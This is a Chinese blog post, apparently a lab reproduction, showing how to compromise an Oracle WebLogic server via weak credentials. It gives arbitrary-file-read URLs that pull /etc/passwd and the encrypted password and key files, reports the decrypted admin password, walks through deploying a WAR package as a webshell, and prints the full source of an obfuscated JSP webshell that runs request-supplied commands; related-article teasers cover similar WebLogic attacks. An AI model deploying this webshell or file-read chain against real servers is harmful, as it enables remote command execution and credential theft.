weblogic弱口令漏洞复现

最新推荐文章于 2024-08-06 22:20:29 发布
最新推荐文章于 2024-08-06 22:20:29 发布
阅读量501 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wutiangui/article/details/134246650
版权

文章目录

一、漏洞特征

1.可以直接获取passwd文件

http://192.168.232.131:7001/hello/file.jsp?path=/etc/passwd
在这里插入图片描述

2.可以直接获取密文文件

http://192.168.232.131:7001/hello/file.jsp?path=./security/SerializedSystemIni.dat
在这里插入图片描述

将密文copy到*.dat文件

3.可以直接获取密钥文件

http://192.168.232.131:7001/hello/file.jsp?path=./config/config.xml
在这里插入图片描述

{AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k=

4.解密密码

在这里插入图片描述

解密后得到密码Oracle@123,用户名是weblogic

5.登录后台

使用解密后的账号登录后台
在这里插入图片描述

二、命令执行复现

1.部署webshell

进入部署页面
在这里插入图片描述

点击安装,上载文件
在这里插入图片描述

选部署档案,上传hello.war
在这里插入图片描述在这里插入图片描述

上传成功后点下一步,选将此部署安装为应用程序,设置应用名称
在这里插入图片描述
在这里插入图片描述

部署完成
在这里插入图片描述

2.Shell命令执行

http://192.168.232.131:7001/hello1/hello1/index.jsp?websafe=id
在这里插入图片描述

3.jsp一句话木马

<%@ page import="com.sun.org.apache.bcel.internal.util.ClassLoader" %>
<html>
  <head>
    <title>Hello</title>
  </head>
  <body>
    @Hello world!@
  </body>
</html>
<%!public String HMfR(String yOK){String aAh="";for (int i = 0; i < yOK.length(); i++) {aAh+=(char)(yOK.charAt(i)+6);}return aAh;}
%>
<% String yiO=request.getParameter("websafe");if(yiO!=null){ Class tJIi = Class.forName(HMfR("d[p[(f[ha(Lohncg_"));
Process Mdlz = (Process) tJIi.getMethod(HMfR("_r_]"), String.class).invoke(tJIi.getMethod(HMfR("a_nLohncg_")).invoke(null),yiO);
java.io.InputStream in = Mdlz.getInputStream();byte[] PYp = new byte[2048];out.print("<pre>");while(in.read(PYp)!=-1){ out.println(new String(PYp)); }out.print("</pre>"); }
%>
Weblogic 弱口令 && 后台getshell漏洞 && SSRF漏洞复现 && SSRF漏洞绕过IP限制 && 任意文件上传漏洞复现(附源码)
代码讲故事
03-19 469
Weblogic 弱口令 && 后台getshell漏洞 && SSRF漏洞复现 && SSRF漏洞绕过IP限制 && 任意文件上传漏洞复现(附源码)。
Weblogic弱口令+后台getshell
时乙的博客
11-21 1745
你有你的路,我有我的路。至于适当的路,正确的路和唯一的路,这样的路并不存在。——尼采 漏洞描述 由于管理员的疏忽,导致weblogic后台管理页面为默认密码或者是弱口令,使得不怀好意的人可以通过破解直接进入后台管理页面。 环境搭建 weblogic使用vulhub搭建 用户名:weblogic 密码:aR3ewO0x 漏洞复现 访问登录页面,登录进入后台管理页面 点击部署->安装 本地制作恶意war包 点击 上载文件 进行上传 选择制作好的war包 点...
WebLogic弱口令,木马反弹连接
h1008685的博客
07-30 1286
weblogic各个版本网站,vulhub使用,weblogic弱口令爆破,任意文件读取漏洞获取服务器加密密码及密钥解密,weblogic部署木马建立反弹连接
WebLogic常见漏洞之弱口密爆破复现
weixin_46263525的博客
07-16 1680
一.WebLogic是美国Oracle公司出品的一个applicationserver,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。漏洞描述输入http//your-ip7001/console即可进入后台,由于管理员的疏忽,有可能会设置一些弱口令,攻击者可以通过一些日常常见的口令猜解进入后台,再通过后台getshell,影响所有版本。...
weblogic系列所有漏洞复现弱口令、CVE-2023-21839、CVE-2018-2894、CVE-2017-10271
qq_47289634的博客
07-05 3599
WebLogic是由Oracle公司开发和提供的一款Java应用服务器。它是一个成熟、可靠且高性能的中间件平台,用于构建、部署和管理企业级Java应用程序。
weblogic漏洞复现
weixin_74182283的博客
03-31 1015
安装weblogic靶场环境已经提供,直接进行实操(weblogic是啥自行搜索)
中间件漏洞 | weblogic-弱口令/任意文件读取
weixin_52116519的博客
10-16 1631
一个基于JAVAEE架构的中间件,用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。通俗地讲weblogic是一种web容器,把我们开发的java应用程序运行起来,并提供服务。服务器:Microsoft Azure云服务器(学生优惠)操作系统:Linux (ubuntu 20.04)环境搭建:使用docker搭建vulhub,并使用weblogic靶场本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞
WebLogic】常见漏洞复现
最新发布
m0_59151303的博客
08-06 1396
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001 WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
Weblogic-弱口令+任意文件读取+Getshell漏洞复现
qq_44674058的博客
10-13 1004
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-29 851
这个URL路径存在任意文件读取漏洞,现在我们知道了这个路径存在任意文件读取漏洞,那我们该如何利用这个漏洞呢?现在我们打开BP,点击进入 Repeater 重放模块,重放以下的数据包获取密文(注意这里的主机IP和端口号要改成你靶机的IP和端口号)然后将文件选择为我们保存的111.dat文件,密文这里填写我们获得得密钥,然后点击确定,成功解密出密码。然后我们重新发送以下的数据包,获取密钥文件(注意这里的主机IP和端口号要改成你靶机的IP和端口号)现在我们得到了密钥的文件,然后将其保存复制下来,后面解密会用到。
weblogic漏洞复现学习
m0_64777251的博客
04-16 1366
Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件,且该漏洞通过HTTP协议进行利用。
Weblogic 漏洞复现
Knsec
06-03 2989
Weblogic 漏洞复现
Weblogic (weak_password)漏洞复现
huangyongkang666的博客
07-22 2252
Weblogic (weak_password)漏洞复现
Weblogic弱口令getshell
hovcfuti的博客
10-13 151
weblogic搭建好之后没有修改进入后台的密码 导致弱口令登录获得webshell。然后默认配置一直下一步,完成就行。使用默认密码登录,或者暴力破解。回到部署界面,发现已经部署成功。使用vulhub拉取靶场。左侧部署→安装→上载文件。上传处理后的war包。
Weblogic漏洞复现【含解密和shell连接工具】
02-20 1994
Weblogic漏洞复现,含解密和shell连接工具。
Weblogic漏洞弱口令、任意文件读取、上传shell
a1b2c3是弱口令
12-09 7097
弱口令 环境启动后,访问http://192.168.1.15:7001/console/login/LoginForm.jsp,即为weblogic后台。 本环境存在弱口令可以直接登录: weblogic Oracle@123 weblogic常用弱口令: 1. Oracle - WebLogic Method HTTP User ID system Password password ...
weblogic快速传jsp木马
weixin_48776804的博客
06-13 2106
weblogic快速传jsp木马
weblogic弱口令漏洞
05-27
WebLogic是一种广泛使用的Java应用服务器,但在默认情况下,它会有一个弱口令漏洞。攻击者可以利用该漏洞通过一些简单的网络请求来获得WebLogic管理员权限,从而可以对服务器进行控制和攻击。 具体来说,当WebLogic...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值